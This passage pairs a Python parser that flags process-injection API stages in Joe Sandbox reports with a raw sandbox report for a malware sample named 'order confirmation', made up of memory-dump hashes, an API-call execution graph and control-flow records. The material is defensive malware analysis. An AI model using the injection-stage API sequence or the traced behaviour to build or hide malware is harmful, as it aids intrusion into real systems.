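            rec["calls"].append({"api": m[1], "module": m[2], "ref": m[4].upper()})
        elif m := _SOURCE.search(line):
            rec["offset"], rec["pe_backed"] = m[1].upper(), m[2] == "true"
        elif m := _API_ID.match(line):
            rec["api_id"] = m[1]
        elif _RECORD_END.match(line):
            if rec["offset"] is not None:
                yield rec
            rec = {"offset": None, "pe_backed": None, "calls": [], "api_id": ""}


def api_names(rec):
    """APIs a record calls. The report's ResumeThread records have an empty
    'APIs' list but carry the name in 'API ID'; use that only when the ID is a
    plain API name (Joe Sandbox otherwise reorders the words, e.g.
    'MemoryProcessRead')."""
    names = {c["api"] for c in rec["calls"]}
    if not names and rec["api_id"] in ALL_APIS:
        names.add(rec["api_id"])
    return names


def classify_regions(text):
    """Group records by dump offset and report which injection stages each
    region's functions cover; 'suspect' means the whole CORE set is present."""
    per_region = defaultdict(set)
    for rec in parse_records(text):
        per_region[rec["offset"]] |= api_names(rec)
    result = {}
    for offset, apis in per_region.items():
        stages = {s for s, names in STAGES.items() if apis & names}
        result[offset] = {"apis": sorted(apis), "stages": sorted(stages),
                          "suspect": CORE <= stages}
    return result


# Constructed sample: five records copied from the report above with the hash
# lines shortened; the fourth mirrors the report's ResumeThread records, whose
# 'APIs' list is empty.
SAMPLE = """\
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D8E780
• Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
• API ID: MemoryProcessRead
• Instruction Fuzzy Hash: 5D21E6B18003599F
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D8E0BE
• Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
• API ID: ContextThreadWow64
• Instruction Fuzzy Hash: 7C2118B19003099F
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D8E5BE
• Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
• API ID: AllocVirtual
• Instruction Fuzzy Hash: 5C1129719003499F
APIs
• Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
• API ID: ResumeThread
• Instruction Fuzzy Hash: 81113AB1D007898F
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0174D60F
• Source File: 00000000.00000002.1654639015.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
• API ID: DuplicateHandle
• Instruction Fuzzy Hash: 5D21C4B59002499F
"""

if __name__ == "__main__":
    for offset, info in sorted(classify_regions(SAMPLE).items()):
        print(offset, "SUSPECT" if info["suspect"] else "ok", info["stages"])
```

Run stand-alone it prints one line per dump region; on the sample, 07D80000 is flagged and 01740000 (DuplicateHandle only) is not. No WriteProcessMemory record appears in this part of the report, so the write side of the injection is not visible in these records; the `write_remote` stage is kept in the table so the same parser reports it when a report does list it.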
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654184552.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_164d000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3be858b5e2b514de6f668048c7d091e080d65691e014d24ccc1ed228b043a9a3
                                                    • Instruction ID: 871ebdeafcd760f68690630f64209417bf6c5c26301980f3d3b837d3bf48fbfd
                                                    • Opcode Fuzzy Hash: 3be858b5e2b514de6f668048c7d091e080d65691e014d24ccc1ed228b043a9a3
                                                    • Instruction Fuzzy Hash: B52103B1A04240DFDB09DF54DDC0B26BF66FB98328F20C569E9090B356C736D456CBA2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654184552.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_164d000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c5fa9e3c9a66cb3faa09c75084a397a35ab6fe8749e31748fdaecbb807163c72
                                                    • Instruction ID: 6ccd47e9cfc106274a8028ff64b5d201b6f9984dd716417fbdd24a0fd8f24b0d
                                                    • Opcode Fuzzy Hash: c5fa9e3c9a66cb3faa09c75084a397a35ab6fe8749e31748fdaecbb807163c72
                                                    • Instruction Fuzzy Hash: 2021F1B5A04204DFDB05DF54D9C4B5ABB65FBA8324F20C169E90A0B356C33AE456CAA2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654223039.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_165d000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 15478139b58906faeb6b6b886823f4f3744edb8d10d26600281ce51d509d7757
                                                    • Instruction ID: 02513bed90adee960a64353f075251156611d5d5249713d18d20f2151b91f7f5
                                                    • Opcode Fuzzy Hash: 15478139b58906faeb6b6b886823f4f3744edb8d10d26600281ce51d509d7757
                                                    • Instruction Fuzzy Hash: CD210071604300AFDB41DF94D9C0B26BBA1FB84224F20C66DEE094B382C376D446CA62
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654223039.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_165d000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a016630239d829ad8d6b04eaab2434f8cdedc09627f0ebf3a72b70dde439fd08
                                                    • Instruction ID: f89e5d32c8e438af080a6049dfd94403ed4a946fe61fb5965587e47e27f4f71d
                                                    • Opcode Fuzzy Hash: a016630239d829ad8d6b04eaab2434f8cdedc09627f0ebf3a72b70dde439fd08
                                                    • Instruction Fuzzy Hash: 2C210E75604300DFDB55DF64D884B26BBA1FB88224F20C56DEC4A4B386C33AD847CA62
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654223039.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_165d000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d0a56a8bf092a9efb8c848583ec2d0b0374ce969f3fa4cd28c52f5404c35c2b1
                                                    • Instruction ID: b056b5d11fb1ccc12f5aba4cfb56ed4db80055e73ecd8505d9a60649ae87f9e3
                                                    • Opcode Fuzzy Hash: d0a56a8bf092a9efb8c848583ec2d0b0374ce969f3fa4cd28c52f5404c35c2b1
                                                    • Instruction Fuzzy Hash: 6B219F755083849FDB03CF64D994B15BF71EB46214F28C5EAD8498F3A7C33A980ACB62
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654184552.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_164d000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                    • Instruction ID: 04213cf5d2f4f99ca46675228e5c13a9c1a27f7452ce9173903ecb4036e4d328
                                                    • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                    • Instruction Fuzzy Hash: 5411DF76904280CFCB06CF54D9C0B16BF72FB94324F24C6A9D8490B257C33AD456CBA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654184552.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_164d000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                    • Instruction ID: 2ed25f70da8603e464171f6f468931939004e2b17cf0e62da806cdb3dbe0725a
                                                    • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                    • Instruction Fuzzy Hash: C011CD76904240DFCB02CF54D9C0B56BF62FB94224F2482A9D8090A257C33AE456CBA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654223039.000000000165D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0165D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_165d000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                    • Instruction ID: 5e244b080ca8e0f5dc69387c0b9c10a2c9eb23cad37bfa6c96ff397424be9f48
                                                    • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                    • Instruction Fuzzy Hash: 2E11BB75504280DFCB02CF54C9C0B15BBA2FB84224F24C6ADDD494B396C33AD44ACB61
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654184552.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_164d000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bcf3f02b20e961dbfb3ff14a31d9ffc44bac79a1d3b1e904fe1ce9867093bb4a
                                                    • Instruction ID: 682a1755de7b596677da3815205d614769a8d6968413644fc5a2cd443994b0c2
                                                    • Opcode Fuzzy Hash: bcf3f02b20e961dbfb3ff14a31d9ffc44bac79a1d3b1e904fe1ce9867093bb4a
                                                    • Instruction Fuzzy Hash: 4901F7718043849BF7109F55CC84B36BF98EF91625F14C51AED084A382C7399401CBB1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654184552.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_164d000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6d31320106e2d9826e50674948af8823fcf0e1640bddf631f6355c2f16d67a3d
                                                    • Instruction ID: 17ba21fddb268895891f1fedbf9fa004377e278b86fb9db6501ef8d0f18a19e8
                                                    • Opcode Fuzzy Hash: 6d31320106e2d9826e50674948af8823fcf0e1640bddf631f6355c2f16d67a3d
                                                    • Instruction Fuzzy Hash: 93F06271404384AFEB109E1ACC88B66FFD8EB91635F18C55AED085A386C7799844CBB1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1669023545.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d90000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9737bff5fbdf6d56ba5bd82f50cb4938c73c73807b749d2daef6829fbfe70044
                                                    • Instruction ID: 17c46cd399cd43214158c3981218e79d3acec0396f303ccc2cfc2bf8c65cd5f9
                                                    • Opcode Fuzzy Hash: 9737bff5fbdf6d56ba5bd82f50cb4938c73c73807b749d2daef6829fbfe70044
                                                    • Instruction Fuzzy Hash: 70722BB0E10219CFDF10DFA8C984AADFBB2FF89300F1585A9D44AAB255D730A995CF51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 60df0ec4edfb21d8e91d62e9fbea7960177eaee6701a23d321316a36e6085d6a
                                                    • Instruction ID: b17690519c267cec2e77985baf1675de8defbb7f7e4e69b63225d1133355085c
                                                    • Opcode Fuzzy Hash: 60df0ec4edfb21d8e91d62e9fbea7960177eaee6701a23d321316a36e6085d6a
                                                    • Instruction Fuzzy Hash: CDE109B4E102198FDB14DFA8C590AAEFBF2FF89305F24816AE854AB355D7319941CF60
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e74280f01d44026c9bba65a5870d351dc90bf01290af0516ddd4683eb2df8ca8
                                                    • Instruction ID: 61294472a0d18fb50eb03525fef8f9c7c5cce5950795d561265f04a3c52fbcde
                                                    • Opcode Fuzzy Hash: e74280f01d44026c9bba65a5870d351dc90bf01290af0516ddd4683eb2df8ca8
                                                    • Instruction Fuzzy Hash: 38E1E8B4E002198FDB14DFA9C590AAEFBF6FF89305F24815AE854AB355D730A941CF60
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4531a420a1fc2baa7c656ad5996f93de819a5d81cb3cbebcf21d3c7c7327be81
                                                    • Instruction ID: 6cc13ad20511a44759dfaea26329da6793910ede4075876dcc3f1c4163b4a4b0
                                                    • Opcode Fuzzy Hash: 4531a420a1fc2baa7c656ad5996f93de819a5d81cb3cbebcf21d3c7c7327be81
                                                    • Instruction Fuzzy Hash: 0CE1E8B4E002198FDB14DFA9C590AAEFBF6FF89305F248159D854AB395D730A941CF60
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ecc313c1ee3aaee500fb9376330712b2e1d4f184c8dde30377e063607047a77a
                                                    • Instruction ID: 10f55a02718f9704038b67b065f1fa56d497a7de8601e3f05f713126942f52d9
                                                    • Opcode Fuzzy Hash: ecc313c1ee3aaee500fb9376330712b2e1d4f184c8dde30377e063607047a77a
                                                    • Instruction Fuzzy Hash: 23E1F8B4E102198FDB14DFA9C580AAEFBB6FF89305F248159E854AB355D730AD41CF60
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8637b7ab1544cf428d703bff4378636aaff4e692f571d4b4d525d83d87198d00
                                                    • Instruction ID: fdbcfd2c217e8b6178f7518ea7ba727bc904dd8689df527df5a26b601cbbd413
                                                    • Opcode Fuzzy Hash: 8637b7ab1544cf428d703bff4378636aaff4e692f571d4b4d525d83d87198d00
                                                    • Instruction Fuzzy Hash: F6E1EAB4E10219CFDB54DFA9C580AAEFBB6FF89305F248199D818A7355D730A942CF60
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1654639015.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1740000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f62edfa659f3a9dc387f1267188a541951d1695ded30cf5fc00be3cd41c02a28
                                                    • Instruction ID: f50965dbf485def451bea7283802fedbd85347ef82d9b9b612f143e7cf603758
                                                    • Opcode Fuzzy Hash: f62edfa659f3a9dc387f1267188a541951d1695ded30cf5fc00be3cd41c02a28
                                                    • Instruction Fuzzy Hash: 02A16132E00215CFCF25DFB8C44459EFBB2FF95300B25856AE905AB265EB71D955CB80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1668915266.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7d80000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a0dccd0cd11e9a3cebc81a69f49a372b58e8ba631b0ce7f1f164bdbf741666b5
                                                    • Instruction ID: 03b35f7aaf59ed8e277e5a07e9cf21e3f37b966dc0e3529a6938d9ef0ca4c31c
                                                    • Opcode Fuzzy Hash: a0dccd0cd11e9a3cebc81a69f49a372b58e8ba631b0ce7f1f164bdbf741666b5
                                                    • Instruction Fuzzy Hash: A5511AB4E002198FDB14DFA9C5805AEFBF6FF89204F24816AD858AB355D7319D42CFA1

                                                    Execution Graph

                                                    Execution Coverage:1.2%
                                                    Dynamic/Decrypted Code Coverage:4.8%
                                                    Signature Coverage:7.6%
                                                    Total number of Nodes:145
                                                    Total number of Limit Nodes:15
                                                    execution_graph 91532 424d63 91533 424d7f 91532->91533 91534 424da7 91533->91534 91535 424dbb 91533->91535 91536 42cab3 NtClose 91534->91536 91542 42cab3 91535->91542 91538 424db0 91536->91538 91539 424dc4 91545 42ec93 RtlAllocateHeap 91539->91545 91541 424dcf 91543 42cacd 91542->91543 91544 42cade NtClose 91543->91544 91544->91539 91545->91541 91684 42c073 91685 42c090 91684->91685 91688 13f2df0 LdrInitializeThunk 91685->91688 91686 42c0b8 91688->91686 91689 42fc13 91690 42fc23 91689->91690 91691 42fc29 91689->91691 91692 42ec53 RtlAllocateHeap 91691->91692 91693 42fc4f 91692->91693 91694 4250f3 91699 42510c 91694->91699 91695 42519c 91696 425154 91697 42eb73 RtlFreeHeap 91696->91697 91698 425164 91697->91698 91699->91695 91699->91696 91700 425197 91699->91700 91701 42eb73 RtlFreeHeap 91700->91701 91701->91695 91546 41e903 91548 41e929 91546->91548 91547 41ea25 91548->91547 91555 42fd43 91548->91555 91550 41e9ba 91550->91547 91551 41ea1c 91550->91551 91566 42c0c3 91550->91566 91551->91547 91561 428cf3 91551->91561 91554 41ead1 91556 42fcb3 91555->91556 91560 42fd10 91556->91560 91570 42ec53 91556->91570 91558 42fced 91573 42eb73 91558->91573 91560->91550 91562 428d58 91561->91562 91563 428d93 91562->91563 91582 418fd3 91562->91582 91563->91554 91565 428d75 91565->91554 91567 42c0e0 91566->91567 91590 13f2c0a 91567->91590 91568 42c10c 91568->91551 91576 42cde3 91570->91576 91572 42ec6e 91572->91558 91579 42ce33 91573->91579 91575 42eb8c 91575->91560 91577 42ce00 91576->91577 91578 42ce11 RtlAllocateHeap 91577->91578 91578->91572 91580 42ce50 91579->91580 91581 42ce61 RtlFreeHeap 91580->91581 91581->91575 91583 418f8e 91582->91583 91586 418fef 91582->91586 91587 42ce83 91583->91587 91585 418fbb 91585->91565 91588 42cea0 91587->91588 91589 42ceb1 ExitProcess 91588->91589 91589->91585 91591 13f2c1f LdrInitializeThunk 91590->91591 91592 13f2c11 91590->91592 91591->91568 91592->91568 91593 419283 91594 4192b3 
91593->91594 91596 4192df 91594->91596 91597 41b733 91594->91597 91598 41b777 91597->91598 91599 42cab3 NtClose 91598->91599 91600 41b798 91598->91600 91599->91600 91600->91594 91601 4144a3 91602 4144bc 91601->91602 91607 417c23 91602->91607 91604 4144da 91605 414526 91604->91605 91606 414513 PostThreadMessageW 91604->91606 91606->91605 91608 417c47 91607->91608 91609 417c83 LdrLoadDll 91608->91609 91610 417c4e 91608->91610 91609->91610 91610->91604 91702 413f33 91703 413f55 91702->91703 91705 42cd43 91702->91705 91706 42cd5d 91705->91706 91709 13f2c70 LdrInitializeThunk 91706->91709 91707 42cd85 91707->91703 91709->91707 91611 401aee 91612 401b37 91611->91612 91612->91612 91615 4300e3 91612->91615 91618 42e723 91615->91618 91619 42e749 91618->91619 91630 407543 91619->91630 91621 42e75f 91622 401c7a 91621->91622 91633 41b543 91621->91633 91624 42e77e 91625 42e793 91624->91625 91627 42ce83 ExitProcess 91624->91627 91644 428603 91625->91644 91627->91625 91628 42e7ad 91629 42ce83 ExitProcess 91628->91629 91629->91622 91648 4168e3 91630->91648 91632 407550 91632->91621 91634 41b56f 91633->91634 91659 41b433 91634->91659 91637 41b5b4 91639 41b5d0 91637->91639 91642 42cab3 NtClose 91637->91642 91638 41b59c 91640 41b5a7 91638->91640 91641 42cab3 NtClose 91638->91641 91639->91624 91640->91624 91641->91640 91643 41b5c6 91642->91643 91643->91624 91646 428665 91644->91646 91645 428672 91645->91628 91646->91645 91670 418a93 91646->91670 91649 416900 91648->91649 91651 416919 91649->91651 91652 42d533 91649->91652 91651->91632 91653 42d54d 91652->91653 91654 42d57c 91653->91654 91655 42c0c3 LdrInitializeThunk 91653->91655 91654->91651 91656 42d5d9 91655->91656 91657 42eb73 RtlFreeHeap 91656->91657 91658 42d5f2 91657->91658 91658->91651 91660 41b44d 91659->91660 91664 41b529 91659->91664 91665 42c163 91660->91665 91663 42cab3 NtClose 91663->91664 91664->91637 91664->91638 91666 42c180 91665->91666 91669 13f35c0 LdrInitializeThunk 91666->91669 91667 41b51d 91667->91663 
91669->91667 91671 418abd 91670->91671 91677 418fbb 91671->91677 91678 414113 91671->91678 91673 418be4 91674 42eb73 RtlFreeHeap 91673->91674 91673->91677 91675 418bfc 91674->91675 91676 42ce83 ExitProcess 91675->91676 91675->91677 91676->91677 91677->91645 91680 414133 91678->91680 91681 41419c 91680->91681 91683 41b853 RtlFreeHeap LdrInitializeThunk 91680->91683 91681->91673 91682 414192 91682->91673 91683->91682 91710 13f2b60 LdrInitializeThunk

                                                    Control-flow Graph
                                                    control_flow_graph 78 417c23-417c3f 79 417c47-417c4c 78->79 80 417c42 call 42f753 78->80 81 417c52-417c60 call 42fd53 79->81 82 417c4e-417c51 79->82 80->79 85 417c70-417c81 call 42e1f3 81->85 86 417c62-417c6d call 42fff3 81->86 91 417c83-417c97 LdrLoadDll 85->91 92 417c9a-417c9d 85->92 86->85 91->92
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_order confirmation.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                    • Instruction ID: 852cf962e2409d618e8b38b88b5540d93302ef35c3232a8832e2f214825db3c9
                                                    • Opcode Fuzzy Hash: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                    • Instruction Fuzzy Hash: 090125B5E0020DA7DF10DBE5DC42FDEB378AB54308F4081A6E90897241F675EB58C795

                                                    Control-flow Graph
                                                    control_flow_graph 98 42cab3-42caec call 404883 call 42dd13 NtClose
                                                    APIs
                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CAE7
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_order confirmation.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 0972272d2523aad39672e0d6cd6478e3c5c68d2fec25f3726e41a2152dbfdc4c
                                                    • Instruction ID: 1f7ce933016469cc88b19e90322ff2e304760343167cfa218f45b51e943dd486
                                                    • Opcode Fuzzy Hash: 0972272d2523aad39672e0d6cd6478e3c5c68d2fec25f3726e41a2152dbfdc4c
                                                    • Instruction Fuzzy Hash: A8E02C362102007BC620FAAADC01FAB736CEFC5B24F00402EFA08A7242C374B90083F0

                                                    Control-flow Graph
                                                    control_flow_graph 116 13f2b60-13f2b6c LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: d208d12b4b75d97e9a929b357e383fee6bb45a784ed539da1641cc64d77f1b62
                                                    • Instruction ID: b04462930b64444472992489cf7867f9500ee920909b320a7d27ae53cfb9f1af
                                                    • Opcode Fuzzy Hash: d208d12b4b75d97e9a929b357e383fee6bb45a784ed539da1641cc64d77f1b62
                                                    • Instruction Fuzzy Hash: 4990026161280143410671594514616400A97F0201B55C032E10145D5DC63589D16625

                                                    Control-flow Graph
                                                    control_flow_graph 118 13f2df0-13f2dfc LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 56a08a3936f89341aba5a2d687c57eb08a992b10046c0bbf8e0dd95a94d0ec11
                                                    • Instruction ID: c1f91a5473c388d4e295ec2b9208c2d6c648bfc0214ac60bfb8534ea61156d2d
                                                    • Opcode Fuzzy Hash: 56a08a3936f89341aba5a2d687c57eb08a992b10046c0bbf8e0dd95a94d0ec11
                                                    • Instruction Fuzzy Hash: 0F90023161180553D11271594604707000997E0241F95C423A042459DDD7768A92A621

                                                    Control-flow Graph
                                                    control_flow_graph 117 13f2c70-13f2c7c LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 26abf816c0bd0d527bd554ced65dc960d12b95e29249d2c296c8777527dcfe12
                                                    • Instruction ID: 588fe6cd9f00427923295f1e6f00f600b68916a487e5e663b196aed6db70798d
                                                    • Opcode Fuzzy Hash: 26abf816c0bd0d527bd554ced65dc960d12b95e29249d2c296c8777527dcfe12
                                                    • Instruction Fuzzy Hash: 8390023161188942D1117159850474A000597E0301F59C422A442469DDC7B589D17621
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 13047b5916f0e40fbb8aa3128b199226f046787430d704161e68e72d7ed6b819
                                                    • Instruction ID: 2ece09d45874a90a8061e125b3e37cba69ffaea4bc08337e837f6e70ec38ee91
                                                    • Opcode Fuzzy Hash: 13047b5916f0e40fbb8aa3128b199226f046787430d704161e68e72d7ed6b819
                                                    • Instruction Fuzzy Hash: A0900231A1590542D10171594614706100597E0201F65C422A04245ADDC7B58A916AA2

                                                    Control-flow Graph

                                                    APIs
                                                    • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 00414520
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_order confirmation.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: sE716IK71M$sE716IK71M
                                                    • API String ID: 1836367815-922563818
                                                    • Opcode ID: b45cae07c9c219c099e0826546d53defafec1ad3bdbe238061a0a9cc026b5f1f
